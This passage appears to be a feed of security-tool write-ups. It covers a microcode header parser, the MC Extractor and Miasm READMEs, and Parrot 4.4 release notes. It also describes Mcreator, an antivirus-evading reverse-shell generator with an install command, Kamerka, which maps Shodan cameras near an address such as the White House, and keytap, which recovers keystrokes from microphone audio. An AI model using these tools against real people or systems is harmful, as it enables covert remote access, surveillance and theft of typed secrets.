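from typing import Dict

HEADER_LEN = 48           # fixed header occupies bytes 0..47
HEADER_VERSION = 1        # only value defined so far for header and loader revision
DEFAULT_DATA_SIZE = 2000  # a Data Size of 0 means 2000 bytes (Total Size 2048)

# Text containers (.dat/.inc/.h/.txt) list the image as hex DWORDs, e.g.
#   0x00000001, 0x00000084, 0x01212018, 0x000906ea,
# optionally with C-style comments.
_DWORD_RE = re.compile(r"0x([0-9a-fA-F]{1,8})")


def container_to_binary(text: str) -> bytes:
    """Pack the DWORDs of a text container into a little-endian binary image."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)  # strip block comments
    text = re.sub(r"//[^\n]*", "", text)                # strip line comments
    dwords = [int(m, 16) for m in _DWORD_RE.findall(text)]
    return struct.pack("<%dI" % len(dwords), *dwords)


def parse_header(image: bytes) -> Dict[str, object]:
    """Decode the 48-byte Intel header: version, revision, BCD date, CPUID, sizes."""
    if len(image) < HEADER_LEN:
        raise ValueError("image shorter than a microcode header")
    (hdr_ver, rev, date, cpuid, checksum, loader_rev,
     pflags, data_size, total_size) = struct.unpack_from("<9I", image, 0)
    if hdr_ver != HEADER_VERSION or loader_rev != HEADER_VERSION:
        raise ValueError("unsupported header/loader revision")
    if data_size == 0:
        data_size = DEFAULT_DATA_SIZE
    if total_size == 0:
        total_size = DEFAULT_DATA_SIZE + HEADER_LEN
    # Date is BCD mmddyyyy: 0x01212018 -> 2018-01-21.
    month = "%02x" % ((date >> 24) & 0xFF)
    day = "%02x" % ((date >> 16) & 0xFF)
    year = "%04x" % (date & 0xFFFF)
    return {
        "revision": rev,
        "date": "%s-%s-%s" % (year, month, day),
        "cpuid": cpuid,
        "platform_flags": pflags,
        "checksum": checksum,
        "data_size": data_size,
        "total_size": total_size,
    }


def checksum_ok(image: bytes) -> bool:
    """True when all DWORDs over Total Size sum to 0 mod 2**32 (the SDM rule)."""
    total = parse_header(image)["total_size"]
    if total % 4 or len(image) < total:
        return False
    dwords = struct.unpack_from("<%dI" % (total // 4), image, 0)
    return sum(dwords) & 0xFFFFFFFF == 0


def build_sample_container() -> str:
    """Constructed 64-byte sample update whose checksum field is made valid."""
    data = bytes(range(16))  # fake update data, 16 bytes
    fields = [HEADER_VERSION, 0x84, 0x01212018, 0x000906EA, 0,  # checksum placeholder
              HEADER_VERSION, 0x00000022, len(data), HEADER_LEN + len(data),
              0, 0, 0]                                          # 12 reserved bytes
    body = struct.pack("<12I", *fields) + data
    partial = sum(struct.unpack("<%dI" % (len(body) // 4), body)) & 0xFFFFFFFF
    fields[4] = (-partial) & 0xFFFFFFFF  # make the whole image sum to zero
    image = struct.pack("<12I", *fields) + data
    dwords = struct.unpack("<%dI" % (len(image) // 4), image)
    lines = ["/* constructed sample, not an Intel release */"]
    for i in range(0, len(dwords), 4):
        lines.append(", ".join("0x%08x" % d for d in dwords[i:i + 4]) + ",")
    return "\n".join(lines)


if __name__ == "__main__":
    img = container_to_binary(build_sample_container())
    info = parse_header(img)
    print("rev 0x%x cpuid 0x%x date %s checksum %s" % (
        info["revision"], info["cpuid"], info["date"],
        "OK" if checksum_ok(img) else "BAD"))
```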

B3. MC Extractor Error Control
During operation, MC Extractor may encounter issues that can trigger Notes, Warnings and/or Errors. Notes (yellow/green color) provide useful information about a characteristic of this particular firmware. Warnings (purple color) notify the user of possible problems that can cause system instability. Errors (red color) are shown when something unexpected or problematic is encountered.

C. Download MC Extractor
MC Extractor consists of two files, the executable (MCE.exe or MCE) and the database (MCE.db). An already built/frozen/compiled binary is provided by me for Windows only (icon designed by Alfredo Hernandez). Thus, you don't need to manually build/freeze/compile MC Extractor under Windows. Instead, download the latest version from the Releases tab, title should be "MC Extractor v1.X.X". You may need to scroll down a bit if there are DB releases at the top. The latter can be used to update the outdated DB which was bundled with the latest executable release, title should be "DB rXX". To extract the already built/frozen/compiled archive, you need to use programs which support RAR5 compression.

C1. Compatibility
MC Extractor should work on all Windows, Linux or macOS operating systems which have Python 3.6 support. Windows users who plan to use the already built/frozen/compiled binaries must make sure that they have the latest Windows Updates installed, which include all required "Universal C Runtime (CRT)" libraries.

C2. Code Prerequisites
To run MC Extractor's python script, you need to have the following 3rd party Python modules installed:
pip3 install colorama
pip3 install https://github.com/platomav/PTable/archive/boxchar.zip

C3. Build/Freeze/Compile with PyInstaller
PyInstaller can build/freeze/compile MC Extractor on all three supported platforms; it is simple to run and gets updated often.
  1. Make sure Python 3.6.0 or newer is installed:
python --version
  2. Use pip to install PyInstaller:
pip3 install pyinstaller
  3. Use pip to install colorama:
pip3 install colorama
  4. Use pip to install PTable:
pip3 install https://github.com/platomav/PTable/archive/boxchar.zip
  5. Build/Freeze/Compile MC Extractor:
pyinstaller --noupx --onefile MCE.py
In the dist folder you should find the final MCE executable.

D. Pictures
Note: Some pictures are outdated and depict older MC Extractor versions.

Miasm - Reverse Engineering Framework In Python

Miasm is a free and open source (GPLv2) reverse engineering framework. Miasm aims to analyze / modify / generate binary programs. Here is a non exhaustive list of features:
  • Opening / modifying / generating PE / ELF 32 / 64 LE / BE using Elfesteem
  • Assembling / Disassembling X86 / ARM / MIPS / SH4 / MSP430
  • Representing assembly semantic using intermediate language
  • Emulating using JIT (dynamic code analysis, unpacking, ...)
  • Expression simplification for automatic de-obfuscation
  • ...
See the official blog for more examples and demos.

Basic examples

Assembling / Disassembling
Import Miasm x86 architecture:
>>> from miasm2.arch.x86.arch import mn_x86
>>> from miasm2.core.locationdb import LocationDB
Get a location db:
>>> loc_db = LocationDB()
Assemble a line:
>>> l = mn_x86.fromstring('XOR ECX, ECX', loc_db, 32)
>>> print l
XOR ECX, ECX
>>> mn_x86.asm(l)
['1\xc9', '3\xc9', 'g1\xc9', 'g3\xc9']
Modify an operand:
>>> l.args[0] = mn_x86.regs.EAX
>>> print l
XOR EAX, ECX
>>> a = mn_x86.asm(l)
>>> print a
['1\xc8', '3\xc1', 'g1\xc8', 'g3\xc1']
Disassemble the result:
>>> print mn_x86.dis(a[0], 32)
XOR EAX, ECX
Using Machine abstraction:
>>> from miasm2.analysis.machine import Machine
>>> mn = Machine('x86_32').mn
>>> print mn.dis('\x33\x30', 32)
XOR ESI, DWORD PTR [EAX]
For Mips:
>>> mn = Machine('mips32b').mn
>>> print mn.dis('97A30020'.decode('hex'), "b")
LHU V1, 0x20(SP)

Intermediate representation
Create an instruction:
>>> machine = Machine('arml')
>>> instr = machine.mn.dis('002088e0'.decode('hex'), 'l')
>>> print instr
ADD R2, R8, R0
Create an intermediate representation object:
>>> ira = machine.ira(loc_db)
Create an empty ircfg
>>> ircfg = ira.new_ircfg()
Add instruction to the pool:
>>> ira.add_instr_to_ircfg(instr, ircfg)
Print current pool:
>>> for lbl, irblock in ircfg.blocks.items():
...     print irblock.to_string(loc_db)
loc_0:
R2 = R8 + R0

IRDst = loc_4
Working with IR, for instance by getting side effects:
>>> for lbl, irblock in ircfg.blocks.iteritems():
...     for assignblk in irblock:
...         rw = assignblk.get_rw()
...         for dst, reads in rw.iteritems():
...             print 'read:   ', [str(x) for x in reads]
...             print 'written:', dst
...             print
...
read: ['R8', 'R0']
written: R2

read: []
written: IRDst

Emulation
Giving a shellcode:
00000000 8d4904      lea    ecx, [ecx+0x4]
00000003 8d5b01      lea    ebx, [ebx+0x1]
00000006 80f901      cmp    cl, 0x1
00000009 7405        jz     0x10
0000000b 8d5bff      lea    ebx, [ebx-1]
0000000e eb03        jmp    0x13
00000010 8d5b01      lea    ebx, [ebx+0x1]
00000013 89d8        mov    eax, ebx
00000015 c3          ret
>>> s = '\x8dI\x04\x8d[\x01\x80\xf9\x01t\x05\x8d[\xff\xeb\x03\x8d[\x01\x89\xd8\xc3'
Import the shellcode thanks to the Container abstraction:
>>> from miasm2.analysis.binary import Container
>>> c = Container.from_string(s)
>>> c
<miasm2.analysis.binary.ContainerUnknown object at 0x7f34cefe6090>
Disassembling the shellcode at address 0:
>>> from miasm2.analysis.machine import Machine
>>> machine = Machine('x86_32')
>>> mdis = machine.dis_engine(c.bin_stream)
>>> asmcfg = mdis.dis_multiblock(0)
>>> for block in asmcfg.blocks:
...     print block.to_string(asmcfg.loc_db)
...
loc_0
LEA ECX, DWORD PTR [ECX + 0x4]
LEA EBX, DWORD PTR [EBX + 0x1]
CMP CL, 0x1
JZ loc_10
-> c_next:loc_b c_to:loc_10
loc_10
LEA EBX, DWORD PTR [EBX + 0x1]
-> c_next:loc_13
loc_b
LEA EBX, DWORD PTR [EBX + 0xFFFFFFFF]
JMP loc_13
-> c_to:loc_13
loc_13
MOV EAX, EBX
RET
Initializing the Jit engine with a stack:
>>> jitter = machine.jitter(jit_type='python')
>>> jitter.init_stack()
Add the shellcode in an arbitrary memory location:
>>> run_addr = 0x40000000
>>> from miasm2.jitter.csts import PAGE_READ, PAGE_WRITE
>>> jitter.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, s)
Create a sentinel to catch the return of the shellcode:
>>> def code_sentinelle(jitter):
...     jitter.run = False
...     jitter.pc = 0
...     return True
...

>>> jitter.add_breakpoint(0x1337beef, code_sentinelle)
>>> jitter.push_uint32_t(0x1337beef)
Activate logs:
>>> jitter.set_trace_log()
Run at arbitrary address:
>>> jitter.init_run(run_addr)
>>> jitter.continue_run()
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000000 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000000
40000000 LEA ECX, DWORD PTR [ECX+0x4]
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
....
4000000e JMP loc_0000000040000013:0x40000013
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000013
40000013 MOV EAX, EBX
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000013
40000015 RET
>>>
Interacting with the jitter:
>>> jitter.vm
ad 1230000 size 10000 RW_ hpad 0x2854b40
ad 40000000 size 16 RW_ hpad 0x25e0ed0

>>> hex(jitter.cpu.EAX)
'0x0L'
>>> jitter.cpu.ESI = 12

Symbolic execution
Initializing the IR pool:
>>> ira = machine.ira(mdis.loc_db)
>>> ircfg = ira.new_ircfg_from_asmcfg(asmcfg)
Initializing the engine with default symbolic values:
>>> from miasm2.ir.symbexec import SymbolicExecutionEngine
>>> sb = SymbolicExecutionEngine(ira)
Launching the execution:
>>> symbolic_pc = sb.run_at(ircfg, 0)
>>> print symbolic_pc
((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
Same, with step logs (only changes are displayed):
>>> sb = SymbolicExecutionEngine(ira, machine.mn.regs.regs_init)
>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)
Instr LEA ECX, DWORD PTR [ECX + 0x4]
Assignblk:
ECX = ECX + 0x4
________________________________________________________________________________
ECX = ECX + 0x4
________________________________________________________________________________
Instr LEA EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
EBX = EBX + 0x1
ECX = ECX + 0x4
________________________________________________________________________________
Instr CMP CL, 0x1
Assignblk:
zf = (ECX[0:8] + -0x1)?(0x0,0x1)
nf = (ECX[0:8] + -0x1)[7:8]
pf = parity((ECX[0:8] + -0x1) & 0xFF)
of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]
cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]
af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
pf = parity((ECX + 0x4)[0:8] + 0xFF)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = ECX + 0x4
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x1
________________________________________________________________________________
Instr JZ loc_key_1
Assignblk:
IRDst = zf?(loc_key_1,loc_key_2)
EIP = zf?(loc_key_1,loc_key_2)
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = ECX + 0x4
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x1
________________________________________________________________________________
>>>
Retry the execution with a concrete ECX. Here, the symbolic / concolic execution reaches the shellcode's end:
>>> from miasm2.expression.expression import ExprInt
>>> sb.symbols[machine.mn.regs.ECX] = ExprInt(-3, 32)
>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)
Instr LEA ECX, DWORD PTR [ECX + 0x4]
Assignblk:
ECX = ECX + 0x4
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = 0x1
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x1
________________________________________________________________________________
Instr LEA EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = 0x1
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x2
________________________________________________________________________________
Instr CMP CL, 0x1
Assignblk:
zf = (ECX[0:8] + -0x1)?(0x0,0x1)
nf = (ECX[0:8] + -0x1)[7:8]
pf = parity((ECX[0:8] + -0x1) & 0xFF)
of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]
cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]
af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]
________________________________________________________________________________
af = 0x0
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = 0x1
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x2
________________________________________________________________________________
Instr JZ loc_key_1
Assignblk:
IRDst = zf?(loc_key_1,loc_key_2)
EIP = zf?(loc_key_1,loc_key_2)
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x10
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x2
________________________________________________________________________________
Instr LEA EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x10
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
________________________________________________________________________________
Instr LEA EBX, DWORD PTR [EBX + 0x1]
Assignblk:
IRDst = loc_key_3
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x13
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
________________________________________________________________________________
Instr MOV EAX, EBX
Assignblk:
EAX = EBX
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x13
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
EAX = EBX + 0x3
________________________________________________________________________________
Instr RET
Assignblk:
IRDst = @32[ESP[0:32]]
ESP = {ESP[0:32] + 0x4 0 32}
EIP = @32[ESP[0:32]]
________________________________________________________________________________
af = 0x0
EIP = @32[ESP]
pf = 0x1
IRDst = @32[ESP]
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
ESP = ESP + 0x4
EAX = EBX + 0x3
________________________________________________________________________________
>>>
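As an added example (not code from the Miasm README), the session above can be replayed without Miasm by a minimal concrete interpreter written in plain Python 3 for exactly the eight instruction encodings that make up the shellcode `s`. The sentinel address, the initial ESP and the code base address are the ones used in the session; the decoder deliberately rejects any encoding not present in `s`.

```python
SHELLCODE = b'\x8dI\x04\x8d[\x01\x80\xf9\x01t\x05\x8d[\xff\xeb\x03\x8d[\x01\x89\xd8\xc3'  # the README's s
REGS = ['EAX', 'ECX', 'EDX', 'EBX', 'ESP', 'EBP', 'ESI', 'EDI']  # ModRM register order
MASK32 = 0xFFFFFFFF
SENTINEL = 0x1337BEEF  # the fake return address the README pushes on the stack

def modrm(byte):  # split a ModRM byte into (mod, reg, rm)
    return byte >> 6, (byte >> 3) & 7, byte & 7

def rel8(byte):  # interpret a byte as a signed 8-bit displacement
    return byte - 256 if byte > 127 else byte

def branch_taken(ecx):
    # The question the symbolic run answers: JZ goes to loc_10 iff the low
    # byte of ECX+4 equals 1 (CMP CL, 1 runs after LEA ECX, [ECX+4]).
    return ((ecx + 4) & 0xFF) == 1

def run_shellcode(code, base=0x40000000, ecx=0, ebx=0, max_steps=100):
    """Execute `code` mapped at `base`; return (registers, flags) at the moment
    RET pops the sentinel, which is what the README's code_sentinelle catches."""
    regs = dict.fromkeys(REGS, 0)
    regs['ECX'], regs['EBX'] = ecx & MASK32, ebx & MASK32
    regs['ESP'] = 0x123FFF8          # same ESP as the README's trace log
    stack = [SENTINEL]               # what jitter.push_uint32_t(0x1337beef) left
    flags = {'zf': 0, 'cf': 0, 'nf': 0}
    pc = base
    for _ in range(max_steps):
        off = pc - base
        if not 0 <= off < len(code):
            raise RuntimeError('pc 0x%x left the mapped page' % pc)
        op = code[off]
        if op == 0x8D:                                  # LEA r32, [r32 + disp8]
            mod, reg, rm = modrm(code[off + 1])
            assert mod == 1 and rm not in (4, 5), 'only [reg + disp8] supported'
            regs[REGS[reg]] = (regs[REGS[rm]] + rel8(code[off + 2])) & MASK32
            pc += 3
        elif op == 0x80:                                # CMP r/m8, imm8 (/7)
            mod, reg, rm = modrm(code[off + 1])
            assert mod == 3 and reg == 7 and rm < 4, 'only CMP low-byte-reg, imm8'
            lhs, imm = regs[REGS[rm]] & 0xFF, code[off + 2]
            res = (lhs - imm) & 0xFF
            flags.update(zf=int(res == 0), cf=int(lhs < imm), nf=res >> 7)
            pc += 3
        elif op == 0x74:                                # JZ rel8
            pc += 2 + (rel8(code[off + 1]) if flags['zf'] else 0)
        elif op == 0xEB:                                # JMP rel8
            pc += 2 + rel8(code[off + 1])
        elif op == 0x89:                                # MOV r/m32, r32
            mod, reg, rm = modrm(code[off + 1])
            assert mod == 3, 'only register-to-register MOV supported'
            regs[REGS[rm]] = regs[REGS[reg]]
            pc += 2
        elif op == 0xC3:                                # RET
            ret = stack.pop()
            regs['ESP'] = (regs['ESP'] + 4) & MASK32
            if ret == SENTINEL:                         # shellcode returned: stop
                return regs, flags
            pc = ret
        else:
            raise NotImplementedError('opcode 0x%02x at 0x%x' % (op, pc))
    raise RuntimeError('step limit reached')
```

With ECX = 0 the run ends with EAX = EBX and ECX = 4, as in the jitter trace; with ECX = -3 it ends with EAX = EBX + 2, because the README's EBX + 0x3 still carries the EBX + 0x1 left in sb.symbols by the first symbolic run on the same engine.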

How does it work?
Miasm embeds its own disassembler, intermediate language and instruction semantics. It is written in Python.
To emulate code, it uses LLVM, GCC, Clang or Python to JIT the intermediate representation. It can emulate shellcodes and all or parts of binaries. Python callbacks can be executed to interact with the execution, for instance to emulate the effects of library functions.

Documentation
TODO
An auto-generated documentation is available here.

Obtaining Miasm

Software requirements
Miasm uses:
  • python-pyparsing
  • python-dev
  • elfesteem from Elfesteem
  • optionally python-pycparser (version >= 2.17)
To enable code JIT, one of the following modules is mandatory:
  • GCC
  • Clang
  • LLVM with Numba llvmlite, see below
'optional' Miasm can also use:

Configuration
  • Install elfesteem
git clone https://github.com/serpilliere/elfesteem.git elfesteem
cd elfesteem
python setup.py build
sudo python setup.py install
To use the jitter, GCC or LLVM is recommended
  • GCC (any version)
  • Clang (any version)
  • LLVM
    • Debian (testing/unstable): Not tested
    • Debian stable/Ubuntu/Kali/whatever: pip install llvmlite or install from llvmlite
    • Windows: Not tested
  • Build and install Miasm:
$ cd miasm_directory
$ python setup.py build
$ sudo python setup.py install
If something goes wrong during the compilation of one of the jitter modules, Miasm will skip the error and disable the corresponding module (see the compilation output).

Windows & IDA
Most of Miasm's IDA plugins use a subset of Miasm functionality. A quick way to have them working is to add:
  • elfesteem directory and pyparsing.py to C:\...\IDA\python\ or pip install pyparsing elfesteem
  • miasm2/miasm2 directory to C:\...\IDA\python\
All features except JITter-related ones will be available. For a more complete installation, please refer to the paragraphs above.

Testing
Miasm comes with a set of regression tests. To run all of them:
cd miasm_directory/test
python test_all.py
Some options can be specified:
  • Mono threading: -m
  • Code coverage instrumentation: -c
  • Only fast tests: -t long (excludes the long tests)

They already use Miasm

Tools
  • Sibyl: A function divination tool
  • R2M2: Use miasm2 as a radare2 plugin
  • CGrex: Targeted patcher for CGC binaries
  • ethRE: Reversing tool for Ethereum EVM (with corresponding Miasm2 architecture)

Blog posts / papers / conferences

Books

Misc
  • Man, does miasm have a link with rr0d?
  • Yes! Crappy code and ugly documentation.


Mcreator - Encoded Reverse Shell Generator With Techniques To Bypass AV's


Encoded Reverse Shell Generator With Techniques To Bypass AV's

Installation
git clone https://github.com/blacknbunny/mcreator.git && cd mcreator/ && python mcreator.py

Version
Python 2.7.* only: the version can't be lower or higher than 2.7 because of the """ syntax used in the scripts.

Running the mcreator console
python mcreator.py -rsg console

Commands
https://github.com/blacknbunny/mcreator/wiki/Commands

Reverse Shells
https://github.com/blacknbunny/mcreator/wiki/Reverse-Shells

Techniques
https://github.com/blacknbunny/mcreator/wiki/Techniques

Compiling
https://github.com/blacknbunny/mcreator/wiki/Compiling

An example of the tool
https://github.com/blacknbunny/mcreator/wiki/An-example

Help
usage: mcreator.py [-h] [-rsg RSGENERATOR]

Reverse Shell generator with techniques to bypass all the AV's

optional arguments:
-h, --help show this help message and exit
-rsg RSGENERATOR, --rsgenerator RSGENERATOR
Reverse Shell Generator With Encryptions & Techniques


Parrot Security 4.4 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind


Parrot 4.4 is now available for download. This release provides security and stability updates and is the starting point for the plan to develop an LTS edition of Parrot.

Parrot 4.4 Development Goals

The Parrot 4.4 development process involved the ideas of many people in the community, and the goal of this new update was mainly to target software developers and increase average system stability.

Upgrade from a previous version

sudo parrot-upgrade
or
sudo apt update
sudo apt full-upgrade

Debian Testing stability status


Parrot is based on Debian Testing, which is now entering an important stabilization stage for the new Debian 10 (buster) release, expected around the second quarter of 2019. This means Parrot is about to see a new golden age of stability and reliability, which this time is going to last much longer, since the team announced the Parrot Long Term Support project in the previous release notes.

New Golang, Rust, Vala and Mono support


The Parrot team has a strong interest in offering a comfortable environment for software developers and for those pentesters who usually write or modify their own tools. We already support Python, Java, C/C++, Ruby, Perl, Bash and PHP, but there is also a big interest in the community in other emerging programming languages like Golang, Rust or Vala.
Parrot 4.4 adds, for the first time, full support for Golang, Rust, Vala and Mono (a FLOSS and independent .NET implementation). We believe software developers will benefit from this choice, which required a lot of effort in order to keep the ISO files within their usual sizes.

New Privacy Metapackage


parrot-privacy now provides all the privacy-related applications, such as anonsurf, torbrowser, ricochet-im, onionshare and more.
People who need stronger privacy now have a dedicated metapackage.

KDE Plasma Edition


The development of the KDE Plasma edition gave very interesting results, and Parrot 4.4 now provides an awesome KDE flavor with our custom themes and settings for all the users who don't like MATE and prefer a more advanced and feature-rich (but heavier) desktop environment.
Parrot KDE includes the latest 5.13 Plasma desktop with custom configurations that proved to be very lightweight and fast, with a small memory footprint, and we will continue to improve this flavor in the future.

BTRFS and XFS are the new default filesystems


The new Debian-Installer was modified to use btrfs by default for the root filesystem and xfs for the home filesystem. The installer no longer creates a swap partition when automatically partitioning UEFI or encrypted systems, and the boot partition is large enough to host multiple kernel revisions without running out of space.
Btrfs and xfs are very powerful advanced filesystems with CoW, subvolumes, snapshots and other features. While xfs is very fast on some specific workloads, btrfs has additional features like live compression and a very efficient checksumming system for detecting file corruption.


Btrfs was considered experimental for many years and is still under heavy development, but its core features are now stable and production-ready (though not ready for mission-critical scenarios), and many companies already use it and contribute to its development, including Facebook, SUSE, Oracle and more.


Kamerka - Build Interactive Map Of Cameras From Shodan


Build an interactive map of cameras from Shodan.
The script creates a map of Shodan cameras based on your address or coordinates. https://medium.com/@woj_ciech/%EA%93%98amerka-build-interactive-map-of-cameras-from-shodan-a0267849ec0a

Requirements
  • Shodan
  • Geopy
  • Folium
  • Colorama
pip install -r requirements.txt
Change API_KEY in line 14

Restrictions
It can be used only with a paid Shodan plan. Built with Python 2.

Usage
root@kali: python kamerka.py --address "White House"

White House, 1600, Pennsylvania Avenue Northwest, Golden Triangle, Washington, D.C., 20500, USA
Found 81 results
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
...
-----------------------------------
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
Saving map as White House.html


kamerka.py --coordinates "x.y,x.y" --dark --radius 4


Other
Do not test on devices you don't own.


Kbd-Audio - Tools For Capturing And Analysing Keyboard Input Paired With Microphone Capture


This is a collection of command-line and GUI tools for capturing and analyzing audio data. The most interesting tool is called keytap - it can guess pressed keyboard keys only by analyzing the audio captured from the computer's microphone.

Build instructions
Dependencies:
  • SDL2 (libsdl) - used to capture audio and to open GUI windows
  • FFTW3 (fftw) - some of the helper tools perform Fourier transformations
Linux and Mac OS
git clone https://github.com/ggerganov/kbd-audio
cd kbd-audio
git submodule update --init
mkdir build && cd build
cmake ..
make
Windows
(todo, PRs welcome)

Tools

record-full
Record audio to a raw binary file on disk
Usage: ./record-full output.kbd

play-full
Playback a recording captured via the record-full tool
Usage: ./play-full input.kbd

record
Record audio only while typing. Useful for collecting training data for keytap
Usage: ./record output.kbd

play
Playback a recording created via the record tool
Usage: ./play input.kbd

keytap
Detect pressed keys via microphone audio capture in real-time. Uses training data captured via the record tool.
Usage: ./keytap-gui input0.kbd [input1.kbd] [input2.kbd] ...
Live demo (WebAssembly threads required)


keytap2 (work in progress)
